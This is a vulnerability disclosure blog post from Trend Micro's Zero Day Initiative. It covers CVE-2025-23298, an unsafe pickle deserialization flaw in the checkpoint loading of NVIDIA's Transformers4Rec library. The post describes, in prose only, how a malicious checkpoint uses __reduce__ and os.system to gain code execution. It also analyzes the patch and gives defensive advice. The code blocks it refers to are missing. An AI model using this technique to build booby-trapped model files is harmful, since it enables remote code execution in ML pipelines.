While investigating the security posture of various machine learning (ML) and artificial intelligence (AI) frameworks, the Trend Micro Zero Day Initiative (ZDI) Threat Hunting Team discovered a critical vulnerability in the NVIDIA Merlin Transformers4Rec library that could allow an attacker to achieve remote code execution with root privileges. This vulnerability, tracked as CVE-2025-23298, stems from unsafe deserialization practices in the model checkpoint loading functionality. What makes this finding particularly interesting is not just the vulnerability itself, but how it highlights the endemic security challenges facing the ML/AI ecosystem’s reliance on Python’s pickle serialization.

In this post, I’ll walk through the discovery process, demonstrate the exploitation technique, analyze the patch, and discuss why this class of vulnerability continues to plague machine learning frameworks despite years of warnings from the security community.

NVIDIA Transformers4Rec

NVIDIA Transformers4Rec is part of the Merlin ecosystem, designed to leverage state-of-the-art transformer architectures for sequential and session-based recommendation tasks. Transformers4Rec acts as a bridge between natural language processing (NLP) and recommender systems (RecSys) by integrating with one of the most popular NLP frameworks, Hugging Face Transformers (HF). According to NVIDIA, Transformers4Rec makes state-of-the-art transformer architectures available for RecSys researchers and industry practitioners.

Transformers4Rec is widely used in production environments for building recommendation systems, particularly in e-commerce and content platforms. The library integrates with other NVIDIA tools like NVTabular for preprocessing and Triton Inference Server (a target in the inaugural AI category at Pwn2Own Berlin 2025) for deployment, making it a critical component in many ML pipelines.

During our research into ML/AI supply chain security, we decided to audit how various frameworks handle model persistence and loading. Given the popularity of Transformers4Rec in production environments and its integration with PyTorch’s serialization mechanisms, it became an interesting target for analysis.

The Vulnerability Discovery

The vulnerability exists in the load_model_trainer_states_from_checkpoint function, which is responsible for restoring model states during training resumption or model deployment. While reviewing the codebase, we noticed that this function directly uses PyTorch’s torch.load() without any safety parameters. Here’s the vulnerable checkpoint loading function before the patch:

This immediately raised red flags. The torch.load() function uses Python’s pickle module under the hood, which is notoriously unsafe when handling untrusted data. The pickle protocol allows arbitrary Python objects to be serialized and deserialized, including objects that execute code during the deserialization process.

Understanding the Attack Surface

To understand why this is dangerous, we need to examine how pickle works. When pickle deserializes an object, it can execute arbitrary Python code through methods such as __reduce__. This isn’t a bug – it’s a feature that allows complex objects to control their own serialization process. However, it becomes a severe security vulnerability when loading untrusted pickle files.

The attack surface is particularly concerning because:

1. Model sharing is common: Data scientists regularly share pre-trained models through repositories, cloud storage, or direct file transfers.

2. Checkpoint files are trusted: Developers often assume checkpoint files are safe, especially when they appear to come from legitimate sources.

3. Execution context: The vulnerability executes in the context of the process loading the model, which often runs with elevated privileges in production environments.

Crafting the Exploit

To demonstrate the vulnerability, we created a malicious checkpoint file that would execute arbitrary commands upon loading. The exploit leverages pickle’s __reduce__ method to execute system commands:

When a victim loads this checkpoint file using the vulnerable function, the os.system command executes immediately before any model weights are loaded. This happens because pickle deserializes objects in order, and our malicious object triggers during the deserialization of model_state_dict.

Real-World Impact

The potential impact of this vulnerability can be severe:

— Remote Code Execution: Attackers can execute arbitrary commands on the target system.

— Privilege Escalation: If the ML service runs with elevated privileges (common in production), the attacker gains those privileges.

— Data Exfiltration: Access to training data, model weights, and potentially other sensitive information.

— Supply Chain Attacks: Malicious models could be distributed through model repositories or sharing platforms.

— Lateral Movement: Compromised ML systems could serve as a foothold for broader network intrusion.

The vulnerability is particularly dangerous in automated ML/AI pipelines where models are loaded without human review, such as continuous training systems or automated model deployment pipelines.

The Patch Analysis

NVIDIA addressed this vulnerability in commit b7eaea5 (PR #802). This changed how checkpoint files are loaded and added additional input validation of serialized python objects.

*Figure 1 - The patch adding a custom load function in transformers4rec/torch/trainer.trainer.load_model_trainer_states_from_checkpoint*

The Transformers4Rec library now implements a serialization mechanism through serialization.py which restricts deserialization to approved classes.

*Figure 2 - The patch adding additional validation in transformers4rec/utils/serialization.py*

Here’s the vulnerable checkpoint loading function after the patch:

Lessons Learned and Recommendations

This vulnerability highlights several important lessons for the AI/ML security community:

For Developers:

• Never use pickle for untrusted data: This cannot be emphasized enough.

• Never assume checkpoint files are safe: Checkpoint deserialization is vulnerable to supply chain attacks.

• Always use weights_only=True when using PyTorch’s load functions.

• Restrict to trusted classes: Restrict deserialization to only trusted classes.

• Implement defense in depth: Don’t rely on a single security measure.

• Consider alternative formats: Safetensors, ONNX, or other secure serialization formats should all be considered.

For Organizations:

• Audit model provenance: Know where your models come from.

• Implement model signing: Cryptographically verify model integrity.

• Sandbox model loading: Run deserialization in isolated environments.

• Regular security audits: Include ML pipelines in security assessments.

For the ML Community:

• Consider moving away from pickle: The community needs to seriously consider deprecating pickle-based serialization.

• Update torch to the latest version: The latest version of torch uses weights_only=True by default.

• Develop secure standards: Establish and enforce secure model serialization standards.

• Security-first design: Build ML frameworks with security as a primary consideration, not an afterthought

Conclusion

CVE-2025-23298 represents yet another instance of unsafe pickle deserialization in the ML/AI ecosystem. While NVIDIA has patched this specific vulnerability, the underlying issue – the ML/AI community’s continued reliance on inherently unsafe serialization methods – remains. As machine learning systems become increasingly critical to business operations and decisions as the foundation of the AI ecosystem, we can no longer afford to treat security as an afterthought. Rigid security measures and a zero-trust mentality must be central as we develop and push towards agentic AI.

The discovery and coordinated disclosure of this vulnerability (thanks to NVIDIA for their work) hopefully serves as another wake-up call. The question isn’t whether more pickle-related vulnerabilities exist in ML/AI frameworks; it’s how many are currently being exploited in the wild.

Until the community moves away from pickle entirely, we’ll continue to see these vulnerabilities. In the meantime, developers must remain vigilant, implement proper security controls, and treat all model files as potentially hostile. You can find me online here, and you can follow the ZDI team on Twitter, Mastodon, LinkedIn, or Bluesky for the latest in exploitation.

Disclosure Timeline

— 2025-05-22 - Vulnerability reported to vendor
— 2025-08-13 - Coordinated public release of advisory
— 2025-08-14 - Advisory Updated

CVE-2025-23298: Getting Remote Code Execution in NVIDIA Merlin

General Inquiries

Find us on X

Find us on Mastodon

Media Inquiries

Sensitive Email Communications